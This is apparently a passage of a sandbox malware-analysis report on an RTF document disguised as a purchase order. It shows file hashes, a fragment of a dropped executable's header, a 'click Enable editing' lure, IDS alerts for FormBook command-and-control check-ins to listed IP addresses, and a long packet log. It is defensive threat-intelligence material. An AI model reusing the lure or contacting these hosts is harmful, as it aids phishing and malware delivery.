                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.................0.................. ........@.. ....................... ............@.....................................O.......^............................................................................ ............... ..H............text........ ...................... ..`.rsrc...^...........................@..@.reloc..............................@..B........................H..........................T#.............................................o................................................&.(9.....*".......*J.~....te...(>...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(9....*.(.........(?...~....(....o@...oA....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..{H...*R..{H.....{H...(F

                                                                                            C:\Users\user\Desktop\~$Q010524Purchase order.doc

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.4797606462020307
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                            MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                            SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                            SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                            SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                            Malicious:false
                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:Rich Text Format data, version 1
                                                                                            Entropy (8bit):3.502941657337733
                                                                                            TrID:
                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                            File name:MOQ010524Purchase order.doc
                                                                                            File size:199'141 bytes
                                                                                            MD5:7ebb7f9239d5dea3e17fd9b51f12c5a7
                                                                                            SHA1:8b73d2e1bf47b9150706d3fbfad2878447e750bf
                                                                                            SHA256:49eae141b85b2dee809a1e86df1518d2d32a79367cf1a01f55f98c98d32f59ce
                                                                                            SHA512:a3218c3415a313e62c6bcb16cca2620970479a053813a829a33b017897923295fd1ca398225116be065db74c863dde450fa314966dba0150f08a07de749bb03d
                                                                                            SSDEEP:3072:ywAlawAlawAlawAlawAl4iCVKOHLH6CjD4ITLw:ywAYwAYwAYwAYwACiCVnHzJA
                                                                                            TLSH:0614CF6DD34B02698F620337AB171E5141BDBA7EF38552B1306C537933EAC39A1252BE
                                                                                            File Content Preview:{\rtf1..{\*\w19tij52d6pUSSiLdrlXDteAhWm4QJhc2wlsEpzoo8D0vwTMdjgHZ4Rv5XInOz0dByHPJQchtcREUPWmgfcAmwLbtTIKCNUNO2yfWwjLwUmMgHdGoatKLw7sBF3oOqwVi28nMm7PzdXV1xbR4NlxqTZPzksPUo7eAr2wMLaY3yyq}..{\476412172please click Enable editing from the yellow bar above.The

                                                                                            File Icon

                                                                                            Icon Hash:2764a3aaaeb7bdbf

                                                                                            Static RTF Info

                                                                                            Objects

                                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                            00000B44Bhno

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            05/02/24-08:28:41.519542TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24918580192.168.2.22183.111.183.31
                                                                                            05/02/24-08:29:16.698315TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24919380192.168.2.22154.41.250.58
                                                                                            05/02/24-08:29:58.393847TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24920180192.168.2.22208.91.197.13
                                                                                            05/02/24-08:27:38.140761TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24916980192.168.2.2294.23.162.163
                                                                                            05/02/24-08:29:36.365325TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24919780192.168.2.22183.111.183.31
                                                                                            05/02/24-08:28:05.644786TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24917780192.168.2.2291.195.240.19
                                                                                            05/02/24-08:29:01.993967TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24918980192.168.2.2267.223.117.189
                                                                                            05/02/24-08:27:51.914592TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24917380192.168.2.22194.9.94.86
                                                                                            05/02/24-08:26:56.872559TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24916480192.168.2.2266.96.161.166
                                                                                            05/02/24-08:28:23.793699TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24918180192.168.2.22198.12.241.35

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 2, 2024 08:26:08.237138033 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.237183094 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.237232924 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.248317003 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.248336077 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.439745903 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.439810991 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.451601982 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.451617956 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.452004910 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.452049971 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.545561075 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.592123985 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880625010 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880682945 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880714893 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.880732059 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880743027 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.880780935 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.880786896 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880825043 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.880837917 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.880886078 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.880985022 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881038904 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881043911 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881089926 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881097078 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881146908 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881162882 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881216049 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881221056 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881273031 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881310940 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881376982 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881381989 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881552935 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.885504961 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985701084 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985774040 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985852957 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985929966 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985935926 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985977888 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985981941 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986027956 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986037016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986073971 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986169100 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986224890 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986227989 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986355066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986460924 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986530066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986534119 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986743927 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986747980 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986824989 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986902952 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986952066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986979961 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987020016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987025976 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987061024 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987067938 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987112999 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987124920 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987169981 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987174034 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987212896 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987627983 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987715960 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987719059 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987730026 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987869978 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987874985 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987937927 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094187975 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094312906 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094346046 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094404936 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094436884 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094444990 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094456911 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094541073 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094763994 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094810009 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094815016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094901085 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094966888 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095030069 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095041037 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095082998 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095093966 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095148087 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095150948 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095201015 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095253944 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095313072 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095861912 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095949888 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096170902 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096230984 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096707106 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096765041 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096771002 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096822023 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097067118 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097129107 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097697020 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097815037 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097898006 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097965002 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.098411083 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.098474979 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.098712921 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.098783016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.099176884 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.099253893 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.202703953 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.202810049 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.202817917 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.202891111 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203082085 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203161001 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203392982 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203448057 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203452110 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203541994 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203881025 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203953028 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204029083 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204077959 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204437971 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204499006 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204565048 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204675913 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205421925 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205565929 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205749035 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205800056 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205904961 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205950975 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206074953 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.206162930 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206399918 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.206465006 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206945896 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207030058 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207149982 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207216978 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207226038 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207350016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207700968 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207775116 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207947016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208069086 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208076000 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208122015 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208749056 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208838940 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208885908 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208921909 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.209108114 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.209167004 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.209691048 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.209795952 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210144043 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210258007 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210647106 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210737944 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210912943 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210977077 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211003065 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211061001 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211776018 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211846113 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211852074 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211901903 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211940050 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.212033987 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.212503910 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.212593079 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.316704035 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.316714048 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.316751957 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.316807985 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.316839933 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.316854000 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.318511009 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.318557978 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.318598032 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.318612099 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.318627119 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.318669081 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.319920063 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.319964886 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.319989920 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.320009947 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.320022106 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.320022106 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.320071936 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.320094109 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.321333885 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.321366072 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.321393967 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.321409941 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.321439028 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.321449995 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.321476936 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.322554111 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.322594881 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.322622061 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.322642088 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.322654009 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.322669983 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.322724104 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.324496031 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.324537992 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.324580908 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.324599981 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.324610949 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.324623108 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.324651003 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.325975895 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.326044083 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.326080084 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.326080084 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.326085091 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.326128960 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.327810049 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.327852011 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.327888012 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.327888012 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.327893972 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.327910900 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.327960014 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.328041077 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.329451084 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.329514027 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.329560041 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.329560041 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.329566002 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.329621077 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.330405951 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.330450058 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.330468893 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.330473900 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.330504894 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.330504894 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.330527067 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.332001925 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.332037926 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.332081079 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.332081079 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.332087040 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.332102060 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.332123995 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.333722115 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.333772898 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.333818913 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.333818913 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.333825111 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.333870888 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.334984064 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335027933 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335057020 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335063934 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335079908 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335112095 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335468054 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335807085 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335846901 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335880995 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335880995 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.335886955 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.335982084 CEST49163443192.168.2.22104.21.74.191
